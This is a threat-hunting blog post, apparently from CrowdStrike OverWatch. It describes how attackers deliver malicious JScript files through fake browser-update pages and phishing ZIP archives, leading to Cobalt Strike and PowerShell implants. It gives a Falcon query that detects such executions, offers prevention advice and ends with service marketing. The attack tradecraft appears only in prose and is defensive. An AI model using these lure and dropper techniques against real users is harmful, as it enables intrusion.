The relative ease with which .js files can be opened provides attackers with an attractive initial access vector, as tricking a user into executing their malicious scripts can be easy. Moreover, the limited logging that is provided by Windows Script Host (WSH) allows adversaries using malicious JScript files to evade some defense mechanisms and go unnoticed for longer.

Figure 1: A proof-of-concept JScript execution that upon double clicking spawns calc.exe. (Click to enlarge)

JScript as an Entry Point for Hands-on-Keyboard Activity

Unsurprisingly, OverWatch threat hunters regularly see intrusions that involve, or even start with, malicious JScript executions. In the first quarter of 2022, OverWatch identified several Fake Browser Update (FBU) infections — two of which led to the delivery of Cobalt Strike beacons followed by hands-on-keyboard activity. The actor likely used hijacked WordPress websites to host fake warnings about outdated browsers or plugins, asking the user to click a button to download the latest version. A malicious .js payload was then packed in a .zip archive, which the user was lured into opening by giving it names such as ChromeUpdate.js. This file connected to a command-and-control (C2) channel, executing various reconnaissance commands (e.g., leveraging whoami, net, nltest and cmdkey) before dropping and running a Cobalt Strike beacon. The actor was then observed using this beacon for hands-on-keyboard activity. 

In another instance, OverWatch observed the use of malicious .js files in financial services-themed phishing lures. The victim organization was sent an email with a .zip file containing  a file called agreement.js. Upon opening, the JScript file reached out to an attacker-controlled domain, setting up a PowerShell implant that allowed the actor to perform further hands-on-keyboard activity. This activity included creating persistence, running various discovery commands and executing BloodHound. OverWatch quickly alerted the victim organization about the malicious activity, enabling them to contain the affected machines.

Detecting and Preventing Malicious JScript Executions in Your Environment

Because of how JScript works, there is not a straightforward way to detect malicious executions. While JScript is considered a legacy technology, it is still relied upon by a vast array of software and admin automation solutions. This can make distinguishing benign behavior from potentially malicious behavior challenging.

As seen in the examples above, to abuse JScript for initial access means, the attacker need only convince a user to open a malicious .js file, which is often provided to the user in an archive file. One approach for hunting in your environment for this malicious needle in your environment’s haystack is to hunt for JScript executions that originate from a user’s download folder or temporary archive locations (e.g., ZIP, RAR or 7Zip files). 

In the CrowdStrike Falcon® platform’s Event Search function, the following query will surface such executions:

event_simpleName=ProcessRollup2 FileName IN ("cscript.exe", "wscript.exe")
| search CommandLine = "*.js*" (CommandLine="*\\downloads\\*" OR (CommandLine="*\\Appdata\\Local\\Temp\\*" AND (CommandLine="*.zip\\*" OR CommandLine="*\\7z*" OR CommandLine="*\\Rar*")))
| rex field=CommandLine "(?i)(?<ArchiveType>\.zip\\\|\\\7z|\\\Rar)"
| eval ArchiveType=case(ArchiveType=".zip\\", "ZIP", ArchiveType="\\7z", "7Z", ArchiveType="\\Rar", "RAR")
| eval isFromArchive=if(ArchiveType!="","Yes", "No")
| eval isInDownloads=if(match(CommandLine, ".*\\\Downloads\\\.*"),"Yes", "No")
| eval ProcExplorer="https://falcon.crowdstrike.com/investigate/process-explorer/" .aid. "/" . TargetProcessId_decimal . "?_cid=" . cid
| convert ctime(_time)
| table _time aid ComputerName UserName isInDownloads isFromArchive ArchiveType FileName CommandLine ParentBaseFileName ProcExplorer
| sort + _time
| rename _time as Time, aid as "Falcon AID", ComputerName as Endpoint, isInDownloads as "In Downloads folder?", isFromArchive as "From Archive?", FileName as ProcessName, CommandLine as ProcessCommandLine, ParentBaseFileName as ParentProcessName, ProcExplorer as "Process Explorer Link"

The output generated by this hunting query may look something like this:

Figure 2: Sample output of the above Event Search query, surfacing suspicious JScript executions. (Click to enlarge)

A next step would be to use the Process Explorer Link to see the process execution and dive deeper into what actions were performed by the JScript file.

Figure 3: Falcon’s Process Explorer reveals the suspiciously-named invoice_2022-03-21.js spawned calc.exe. (Click to enlarge)

The above example shows the execution of calc.exe, which may be considered unusual in a given environment. This would provide for further hunting opportunities, such as analyzing unusual children spawned by wscript.exe. 

If the given hunting query produces too many results, it is possible to narrow the search further — for example, by limiting it to wscript.exe executions that involve spawning new processes, writing certain file types to disk, or manipulating sensitive registry locations.

From a prevention perspective, there are a few things that can be done. A key weakness in how JScript is set up in Windows is that double clicking a .js file quickly leads to execution. Removing the file association of .js files with wscript.exe may reduce the chances of success. Without the file association, a user would have to use the command line prompt to execute the file. Thus, an unsuspecting user double clicking a link in a phish would not result in a successful phish. Further, partially disabling JScript could reduce the attack surface. Microsoft also offers an option to completely disable Windows Script Host (although in most corporate environments this would not be a feasible option).

The Value of OverWatch Elite

Hunting for malicious .js executions can prove difficult due to high data volumes, legitimate use of JScript files and the variety of ways in which attackers can abuse JScript. To effectively defend against this requires deep knowledge of your environment, insights as to how attackers operate and experience with regards to detecting follow-on behavior. Managing this and other day-to-day responsibilities can easily overwhelm an in-house security team. 

OverWatch’s preeminent managed threat hunting service protects customer environments on a 24/7/365 basis. OverWatch’s primary mission is to pinpoint malicious activities at the earliest possible stage, providing customers with timely, high-fidelity and, most importantly, actionable notifications and context that inform a swift and decisive response.

OverWatch Elite builds on the 24/7/365 threat hunting operations provided as a part of OverWatch standard and includes additional services, such as: 60-minute call escalation for critical threats, quarterly threat briefings, tailored threat hunting and more. OverWatch Elite customers are also invited to a private Slack channel where they can reach an OverWatch Elite analyst to respond with speed and confidence.

For more information, please visit the OverWatch Elite page on CrowdStrike’s website.

Additional Resources

❌